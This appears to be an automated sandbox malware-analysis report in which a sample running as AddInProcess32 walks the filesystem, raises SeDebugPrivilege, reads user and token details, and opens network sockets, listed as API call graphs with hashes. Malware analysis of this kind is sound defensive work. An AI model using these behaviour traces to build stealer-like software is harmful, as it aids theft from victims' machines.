9001 402bab 2 API calls 8999->9001 9000->8988 9001->8993 9002 4031e5 4 API calls 9003 403e84 FindNextFileW 9002->9003 9004 403e96 9003->9004 9003->9017 9025 403bef 9004->9025 9006 405b6f 6 API calls 9006->9016 9007 4031e5 4 API calls 9009 403f50 FindNextFileW 9007->9009 9008 405b6f 6 API calls 9008->9017 9010 403f87 9009->9010 9009->9016 9012 403bef 5 API calls 9010->9012 9011 403f75 9013 402bab 2 API calls 9011->9013 9012->8999 9015 403f7b 9013->9015 9014 403d74 7 API calls 9014->9017 9018 403bef 5 API calls 9015->9018 9016->9006 9016->9007 9016->9011 9019 402bab 2 API calls 9016->9019 9017->9002 9017->9008 9017->9014 9020 402bab 2 API calls 9017->9020 9021 403f63 9017->9021 9018->8993 9019->9016 9020->9017 9022 402bab 2 API calls 9021->9022 9023 403f69 9022->9023 9024 403bef 5 API calls 9023->9024 9024->8993 9026 4031e5 4 API calls 9025->9026 9027 403c01 FindClose 9026->9027 9027->8998 9214 4049dc 9215 4031e5 4 API calls 9214->9215 9216 4049ef SHEnumKeyExW 9215->9216 9886 40cddd 9887 405b6f 6 API calls 9886->9887 9888 40cdee 9887->9888 9889 40ce06 9888->9889 9890 413a58 14 API calls 9888->9890 9891 40ce59 9889->9891 9893 405b6f 6 API calls 9889->9893 9892 40ce00 9890->9892 9894 402bab 2 API calls 9892->9894 9895 40ce1c 9893->9895 9894->9889 9895->9891 9896 403d74 11 API calls 9895->9896 9900 40ce52 9895->9900 9898 40ce45 9896->9898 9897 402bab 2 API calls 9897->9891 9899 402bab 2 API calls 9898->9899 9898->9900 9899->9900 9900->9897 9217 40ecde 9218 412093 13 API calls 9217->9218 9219 40ecfd 9218->9219 9220 412093 13 API calls 9219->9220 9221 40ed0d 9220->9221 9225 40e8df 9226 412093 13 API calls 9225->9226 9227 40e8f8 9226->9227 9228 412093 13 API calls 9227->9228 9229 40e908 9228->9229 9236 404b22 9229->9236 9231 40e91c 9234 40e936 9231->9234 9235 40e93d 9231->9235 9243 40e944 9231->9243 9233 402bab 2 API calls 9233->9235 9234->9233 9237 402b7c 2 API calls 9236->9237 9239 404b33 9237->9239 9238 404b66 9238->9231 9239->9238 9252 4049b3 9239->9252 9241 404b5f 9241->9238 9242 402bab 2 API calls 9241->9242 9242->9238 9244 4056bf 2 API calls 9243->9244 9245 40e952 9244->9245 9246 40e976 9245->9246 9247 4057df 14 API calls 9245->9247 9246->9234 9248 40e966 9247->9248 9249 413aca 4 API calls 9248->9249 9250 40e970 9249->9250 9251 405695 2 API calls 9250->9251 9251->9246 9253 4031e5 4 API calls 9252->9253 9254 4049c6 SHGetValueW 9253->9254 9254->9241 9255 4139de 9264 413855 9255->9264 9257 4139f1 9258 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9257->9258 9259 4139f7 9258->9259 9260 413866 66 API calls 9259->9260 9261 413a2d 9260->9261 9262 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9261->9262 9263 413a34 9262->9263 9265 4031e5 4 API calls 9264->9265 9266 413864 9265->9266 9266->9266 9906 4116e7 9907 4117ba 9906->9907 9908 4117f1 9907->9908 9909 405b6f 6 API calls 9907->9909 9910 4117d0 9909->9910 9910->9908 9911 404cbf 9 API calls 9910->9911 9912 4117eb 9911->9912 9913 402bab 2 API calls 9912->9913 9913->9908 9286 4094e7 9287 404b22 7 API calls 9286->9287 9288 4094fe 9287->9288 9289 409554 9288->9289 9290 405b6f 6 API calls 9288->9290 9291 409514 9290->9291 9292 40954d 9291->9292 9294 404b22 7 API calls 9291->9294 9293 402bab 2 API calls 9292->9293 9293->9289 9295 40952d 9294->9295 9297 409408 18 API calls 9295->9297 9300 409544 9295->9300 9296 402bab 2 API calls 9296->9292 9298 40953e 9297->9298 9299 402bab 2 API calls 9298->9299 9299->9300 9300->9296 9955 40d4ea 9956 404bee 7 API calls 9955->9956 9957 40d500 9956->9957 9958 404bee 7 API calls 9957->9958 9963 40d5a0 9957->9963 9959 40d529 9958->9959 9960 404bee 7 API calls 9959->9960 9961 40d537 9960->9961 9962 404bee 7 API calls 9961->9962 9964 40d546 9962->9964 9964->9963 9965 405872 4 API calls 9964->9965 9966 40d56d 9965->9966 9967 405872 4 API calls 9966->9967 9968 40d57c 9967->9968 9969 405872 4 API calls 9968->9969 9970 40d58e 9969->9970 9971 405872 4 API calls 9970->9971 9971->9963 9972 4058ea 9973 4031e5 4 API calls 9972->9973 9974 4058fd 9973->9974 9975 40a3ea 9976 40374e 6 API calls 9975->9976 9977 40a403 9976->9977 9978 4059d8 4 API calls 9977->9978 9981 40a419 9977->9981 9979 40a411 9978->9979 9980 402bab 2 API calls 9979->9980 9980->9981 9346 404df3 WSAStartup 9350 4091f6 9351 404b22 7 API calls 9350->9351 9352 40920b 9351->9352 9353 409222 9352->9353 9354 409408 18 API calls 9352->9354 9355 40921c 9354->9355 9356 402bab 2 API calls 9355->9356 9356->9353 10008 4117fe 10009 404c4e 6 API calls 10008->10009 10010 411888 10009->10010 10011 404c4e 6 API calls 10010->10011 10015 411925 10010->10015 10012 4118ab 10011->10012 10012->10015 10027 4119b3 10012->10027 10014 4118c5 10016 4119b3 4 API calls 10014->10016 10017 4118d0 10016->10017 10017->10015 10018 4056bf 2 API calls 10017->10018 10019 4118fd 10018->10019 10020 405872 4 API calls 10019->10020 10021 41190a 10020->10021 10022 405872 4 API calls 10021->10022 10023 411915 10022->10023 10024 413aca 4 API calls 10023->10024 10025 41191f 10024->10025 10026 405695 2 API calls 10025->10026 10026->10015 10028 4119c6 10027->10028 10030 4119bf 10027->10030 10029 4031e5 4 API calls 10028->10029 10029->10030 10030->10014 9360 40e880 9361 41219c 15 API calls 9360->9361 9362 40e88e 9361->9362 9363 41219c 15 API calls 9362->9363 9364 40e89c 9363->9364 10094 40e48a 10095 404bee 7 API calls 10094->10095 10097 40e4d0 10095->10097 10096 40e4f4 10097->10096 10098 405872 4 API calls 10097->10098 10098->10096 9461 410390 9462 404b22 7 API calls 9461->9462 9463 4103a5 9462->9463 9464 410409 9463->9464 9465 405b6f 6 API calls 9463->9465 9470 4103ba 9465->9470 9466 410402 9467 402bab 2 API calls 9466->9467 9467->9464 9468 4103fb 9469 402bab 2 API calls 9468->9469 9469->9466 9470->9466 9470->9468 9471 403d74 11 API calls 9470->9471 9472 4103ee 9471->9472 9472->9468 9473 402bab 2 API calls 9472->9473 9473->9468 10109 40ed96 10110 4040bb 13 API calls 10109->10110 10113 40edb0 10110->10113 10111 40ef90 10112 403f9e 5 API calls 10112->10111 10113->10111 10114 405ae9 6 API calls 10113->10114 10115 412269 6 API calls 10113->10115 10116 40ef61 10113->10116 10122 40ef87 10113->10122 10123 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10113->10123 10124 402bab GetProcessHeap HeapFree 10113->10124 10114->10113 10115->10113 10117 40ef6e 10116->10117 10118 402bab 2 API calls 10116->10118 10119 40ef7c 10117->10119 10120 402bab 2 API calls 10117->10120 10118->10117 10121 402bab 2 API calls 10119->10121 10119->10122 10120->10119 10121->10122 10122->10112 10123->10113 10124->10113 10125 40ef98 10126 404c4e 6 API calls 10125->10126 10127 40efb6 10126->10127 10139 40f02a 10127->10139 10140 40f054 10127->10140 10130 404bee 7 API calls 10131 40efda 10130->10131 10132 404bee 7 API calls 10131->10132 10133 40efe9 10132->10133 10134 405872 4 API calls 10133->10134 10133->10139 10135 40f008 10134->10135 10136 405872 4 API calls 10135->10136 10137 40f01a 10136->10137 10138 405872 4 API calls 10137->10138 10138->10139 10141 40f064 10140->10141 10142 402b7c 2 API calls 10141->10142 10144 40f072 10142->10144 10143 40efca 10143->10130 10144->10143 10146 405ecd 10144->10146 10147 4059b8 4 API calls 10146->10147 10148 405edf 10147->10148 10148->10144 9480 410c98 9481 41219c 15 API calls 9480->9481 9482 410ca8 9481->9482 9483 41219c 15 API calls 9482->9483 9484 410cb5 9483->9484 9485 412093 13 API calls 9484->9485 9486 410cc9 9485->9486 10218 41249c 10219 4056bf 2 API calls 10218->10219 10220 4124aa 10219->10220 10221 4057df 14 API calls 10220->10221 10226 4124ce 10220->10226 10222 4124be 10221->10222 10223 413aca 4 API calls 10222->10223 10224 4124c8 10223->10224 10225 405695 2 API calls 10224->10225 10225->10226 9490 40f49e 9491 40f4b6 14 API calls 9490->9491 9492 40f4a8 9491->9492 9493 40929e 9494 413b28 7 API calls 9493->9494 9495 4092a4 9494->9495 9496 405b6f 6 API calls 9495->9496 9497 4092af 9496->9497 9498 4092c5 9497->9498 9499 409408 18 API calls 9497->9499 9500 4092bf 9499->9500 9501 402bab 2 API calls 9500->9501 9501->9498 10327 407fa4 10328 407fb7 10327->10328 10329 402b7c 2 API calls 10328->10329 10330 407fee 10328->10330 10331 40800d 10329->10331 10331->10330 10332 4037be 4 API calls 10331->10332 10333 40803c 10332->10333 10334 402bab 2 API calls 10333->10334 10334->10330 9535 4090aa 9536 404b22 7 API calls 9535->9536 9537 4090c1 9536->9537 9538 4090d8 9537->9538 9539 409408 18 API calls 9537->9539 9540 404b22 7 API calls 9538->9540 9541 4090d2 9539->9541 9542 4090eb 9540->9542 9543 402bab 2 API calls 9541->9543 9544 409104 9542->9544 9545 408c4d 17 API calls 9542->9545 9543->9538 9546 4090fe 9545->9546 9547 402bab 2 API calls 9546->9547 9547->9544 9554 409cae 9569 404b79 9554->9569 9556 409d2f 9557 409cc5 9557->9556 9559 405b6f 6 API calls 9557->9559 9561 409d27 9557->9561 9558 402bab 2 API calls 9558->9556 9560 409cec 9559->9560 9560->9561 9562 404b79 7 API calls 9560->9562 9561->9558 9563 409d05 9562->9563 9564 409d1e 9563->9564 9565 408c4d 17 API calls 9563->9565 9566 402bab 2 API calls 9564->9566 9567 409d18 9565->9567 9566->9561 9568 402bab 2 API calls 9567->9568 9568->9564 9570 404b22 7 API calls 9569->9570 9571 404b8a 9570->9571 9571->9557 10378 411fb3 10379 405b6f 6 API calls 10378->10379 10381 412013 10379->10381 10380 412075 10381->10380 10396 41206a 10381->10396 10397 411a8d 10381->10397 10383 402bab 2 API calls 10383->10380 10385 4056bf 2 API calls 10386 41203d 10385->10386 10387 405872 4 API calls 10386->10387 10388 41204a 10387->10388 10389 413aca 4 API calls 10388->10389 10390 412054 10389->10390 10391 405695 2 API calls 10390->10391 10392 41205a 10391->10392 10393 413a58 14 API calls 10392->10393 10394 412064 10393->10394 10395 402bab 2 API calls 10394->10395 10395->10396 10396->10383 10398 402b7c 2 API calls 10397->10398 10399 411aa3 10398->10399 10407 411f05 10399->10407 10420 404ada 10399->10420 10402 404ada 4 API calls 10403 411cad 10402->10403 10404 411f0c 10403->10404 10405 411cc0 10403->10405 10406 402bab 2 API calls 10404->10406 10423 405eb6 10405->10423 10406->10407 10407->10385 10407->10396 10409 411d3c 10410 4031e5 4 API calls 10409->10410 10418 411d7b 10410->10418 10411 411ea6 10412 4031e5 4 API calls 10411->10412 10413 411eb5 10412->10413 10414 4031e5 4 API calls 10413->10414 10415 411ed6 10414->10415 10416 405eb6 4 API calls 10415->10416 10416->10407 10417 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10417->10418 10418->10411 10418->10417 10419 405eb6 4 API calls 10418->10419 10419->10418 10421 4031e5 4 API calls 10420->10421 10422 404afd 10421->10422 10422->10402 10424 405998 4 API calls 10423->10424 10425 405ec8 10424->10425 10425->10409 9601 40f6b8 9602 41219c 15 API calls 9601->9602 9603 40f6c7 9602->9603 9604 41219c 15 API calls 9603->9604 9605 40f6d5 9604->9605 9606 41219c 15 API calls 9605->9606 9607 40f6df 9606->9607 9626 40d6bd 9627 4056bf 2 API calls 9626->9627 9628 40d6c9 9627->9628 9639 404cbf 9628->9639 9631 404cbf 9 API calls 9632 40d6f4 9631->9632 9633 404cbf 9 API calls 9632->9633 9634 40d702 9633->9634 9635 413aca 4 API calls 9634->9635 9636 40d711 9635->9636 9637 405695 2 API calls 9636->9637 9638 40d71f 9637->9638 9640 402b7c 2 API calls 9639->9640 9641 404ccd 9640->9641 9642 404ddc 9641->9642 9643 404b8f 5 API calls 9641->9643 9642->9631 9644 404ce4 9643->9644 9645 404dd4 9644->9645 9647 402b7c 2 API calls 9644->9647 9646 402bab 2 API calls 9645->9646 9646->9642 9653 404d04 9647->9653 9648 404dcc 9649 404a39 5 API calls 9648->9649 9649->9645 9650 404dc6 9651 402bab 2 API calls 9650->9651 9651->9648 9652 402b7c 2 API calls 9652->9653 9653->9648 9653->9650 9653->9652 9654 404b8f 5 API calls 9653->9654 9655 404a39 5 API calls 9653->9655 9656 405b6f 6 API calls 9653->9656 9657 404cbf 9 API calls 9653->9657 9658 402bab GetProcessHeap HeapFree 9653->9658 9660 40d726 9653->9660 9654->9653 9655->9653 9656->9653 9657->9653 9658->9653 9676 404bee 9660->9676 9663 405872 4 API calls 9666 40d761 9663->9666 9664 404bee 7 API calls 9664->9666 9665 405872 4 API calls 9665->9666 9666->9664 9666->9665 9668 40d971 9666->9668 9669 405781 4 API calls 9668->9669 9674 40d9bb 9668->9674 9684 404ba7 9668->9684 9669->9668 9671 405781 4 API calls 9671->9674 9673 405872 4 API calls 9673->9674 9674->9671 9674->9673 9675 40db63 9674->9675 9687 404c4e 9674->9687 9694 4037be 9674->9694 9675->9653 9677 402b7c 2 API calls 9676->9677 9679 404bff 9677->9679 9678 404c3b 9678->9663 9678->9675 9679->9678 9680 4031e5 4 API calls 9679->9680 9681 404c28 SHQueryValueExW 9680->9681 9681->9678 9682 404c3f 9681->9682 9683 402bab 2 API calls 9682->9683 9683->9678 9685 4031e5 4 API calls 9684->9685 9686 404bca 9685->9686 9686->9668 9688 402b7c 2 API calls 9687->9688 9689 404c60 9688->9689 9690 404ca4 9689->9690 9691 4031e5 4 API calls 9689->9691 9690->9674 9692 404c8d 9691->9692 9692->9690 9693 402bab 2 API calls 9692->9693 9693->9690 9695 4031e5 4 API calls 9694->9695 9696 4037e2 9695->9696 9697 40382b 9696->9697 9698 402b7c 2 API calls 9696->9698 9697->9674 9699 403802 9698->9699 9700 403832 9699->9700 9702 403809 9699->9702 9701 4036a3 4 API calls 9700->9701 9701->9697 9703 4036a3 4 API calls 9702->9703 9703->9697 9704 40f0bf 9705 4056bf 2 API calls 9704->9705 9706 40f0c9 9705->9706 9707 404cbf 9 API calls 9706->9707 9716 40f115 9706->9716 9710 40f0ed 9707->9710 9708 41219c 15 API calls 9709 40f128 9708->9709 9711 404cbf 9 API calls 9710->9711 9712 40f0fb 9711->9712 9713 413aca 4 API calls 9712->9713 9714 40f10a 9713->9714 9715 405695 2 API calls 9714->9715 9715->9716 9716->9708

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 296 403d74-403d90 call 4067c4 299 403d96-403da9 call 405b6f 296->299 300 403ea9-403ec0 call 405b6f 296->300 305 403ea6-403ea8 299->305 306 403daf-403dcb call 4031e5 FindFirstFileW 299->306 307 403f95 300->307 308 403ec6-403ee2 call 4031e5 FindFirstFileW 300->308 305->300 314 403dd1-403dd8 306->314 315 403e9d-403ea4 call 402bab 306->315 309 403f97-403f9d 307->309 316 403ee8-403ef8 call 405d24 308->316 317 403f8e-403f94 call 402bab 308->317 319 403e75-403e90 call 4031e5 FindNextFileW 314->319 320 403dde-403de2 314->320 315->305 329 403f03-403f0a 316->329 330 403efa-403f01 316->330 317->307 319->314 334 403e96-403e97 call 403bef 319->334 324 403e12-403e22 call 405d24 320->324 325 403de4-403df9 call 405eff 320->325 342 403e30-403e4c call 405b6f 324->342 343 403e24-403e2e 324->343 325->319 345 403dfb-403e10 call 405eff 325->345 336 403f12-403f2d call 405b6f 329->336 337 403f0c-403f10 329->337 330->329 335 403f41-403f5c call 4031e5 FindNextFileW 330->335 346 403e9c 334->346 354 403f87-403f88 call 403bef 335->354 355 403f5e-403f61 335->355 336->335 352 403f2f-403f33 336->352 337->335 337->336 342->319 358 403e4e-403e6f call 403d74 call 402bab 342->358 343->319 343->342 345->319 345->324 346->315 356 403f75-403f85 call 402bab call 403bef 352->356 357 403f35-403f40 call 402bab 352->357 362 403f8d 354->362 355->316 356->309 357->335 358->319 372 403f63-403f73 call 402bab call 403bef 358->372 362->317 372->309
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstNext
                                                                                                • String ID: %s\%s$%s\*$Program Files$Windows
                                                                                                • API String ID: 1690352074-2009209621
                                                                                                • Opcode ID: 4bf4f5d537e0fb4440aa84fa95ff9fbaec45dc738c26a4351b82ac916622dd20
                                                                                                • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                                                                • Opcode Fuzzy Hash: 4bf4f5d537e0fb4440aa84fa95ff9fbaec45dc738c26a4351b82ac916622dd20
                                                                                                • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                                                                APIs
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                                • String ID: SeDebugPrivilege
                                                                                                • API String ID: 3615134276-2896544425
                                                                                                • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                                • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                                                                • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                                • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 1357844191-0
                                                                                                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                                                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                                                                APIs
                                                                                                • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: NameUser
                                                                                                • String ID:
                                                                                                • API String ID: 2645101109-0
                                                                                                • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                                                                                • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                                                                                • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                                                                                • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 377 4061c3-4061f2 call 402bf2 call 4031e5 383 4061f4-4061ff GetLastError 377->383 384 40622a-40623b call 402b7c 377->384 385 406201-406203 383->385 386 406208-406228 call 4060ac call 4031e5 383->386 392 40624c-406258 call 402b7c 384->392 393 40623d-406249 call 40338c 384->393 388 406329-40632e 385->388 386->384 386->385 400 406269-406290 call 4031e5 GetTokenInformation 392->400 401 40625a-406266 call 40338c 392->401 393->392 407 406292-4062a0 call 402b7c 400->407 408 4062fe-406302 400->408 401->400 407->408 420 4062a2-4062b9 call 406086 407->420 409 406304-406307 call 403c40 408->409 410 40630d-40630f 408->410 419 40630c 409->419 414 406311-406317 call 402bab 410->414 415 406318-40631e 410->415 414->415 417 406320-406326 call 402bab 415->417 418 406327 415->418 417->418 418->388 419->410 426 4062f5-4062fd call 402bab 420->426 427 4062bb-4062e4 call 4031e5 LookupAccountSidW 420->427 426->408 427->426 432 4062e6-4062f3 call 405b6f 427->432 432->426
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                                                                • _wmemset.LIBCMT ref: 00406244
                                                                                                • _wmemset.LIBCMT ref: 00406261
                                                                                                • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                                                                • LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _wmemset$AccountErrorInformationLastLookupToken
                                                                                                • String ID: IDA$IDA
                                                                                                • API String ID: 3235442692-2020647798
                                                                                                • Opcode ID: b2ae47ba8f41fed610fef6eab258e0ae4dc6551deef85bf4ce41cfc9478809f5
                                                                                                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                                                • Opcode Fuzzy Hash: b2ae47ba8f41fed610fef6eab258e0ae4dc6551deef85bf4ce41cfc9478809f5
                                                                                                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 763 404e17-404e57 getaddrinfo 764 404e59-404e5b 763->764 765 404e5d-404e84 call 402b7c socket 763->765 766 404ecf-404ed3 764->766 769 404e86-404e96 call 402bab freeaddrinfo 765->769 770 404e98-404ea7 connect 765->770 778 404ec7-404ec9 769->778 772 404eb3-404ebe freeaddrinfo 770->772 773 404ea9-404eb1 call 404de5 770->773 776 404ec0-404ec6 call 402bab 772->776 777 404ecb 772->777 773->772 776->778 781 404ecd-404ece 777->781 778->781 781->766
                                                                                                APIs
                                                                                                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                                                • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                                                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: freeaddrinfogetaddrinfosocket
                                                                                                • String ID:
                                                                                                • API String ID: 2479546573-0
                                                                                                • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                                                                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                                                • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                                                                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 783 4040bb-4040f2 call 4031e5 CreateFileW 786 4040f8-404111 call 4031e5 783->786 787 40418d-404190 783->787 797 404113-404119 786->797 798 40417a 786->798 789 404192-4041a7 call 403c90 787->789 790 404184 787->790 789->790 796 4041a9-4041b8 call 403c59 789->796 792 404186-40418c 790->792 806 4041ba-4041d8 call 4040bb call 403d44 796->806 807 4041db-4041e4 call 402bab 796->807 797->798 801 40411b-404120 797->801 800 40417d-40417e call 403c40 798->800 809 404183 800->809 804 404122 801->804 805 404124-404140 call 4031e5 VirtualAlloc 801->805 804->805 805->798 816 404142-40415e call 4031e5 ReadFile 805->816 806->807 807->792 809->790 816->800 820 404160-404178 call 4031e5 816->820 820->800
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AllocCreateReadVirtual
                                                                                                • String ID: .tmp
                                                                                                • API String ID: 3585551309-2986845003
                                                                                                • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                                                • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                                                                • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                                                • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                                                                APIs
                                                                                                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                                                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                                                • GetLastError.KERNEL32 ref: 0041399E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Error$CreateLastModeMutex
                                                                                                • String ID:
                                                                                                • API String ID: 3448925889-0
                                                                                                • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                                                • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
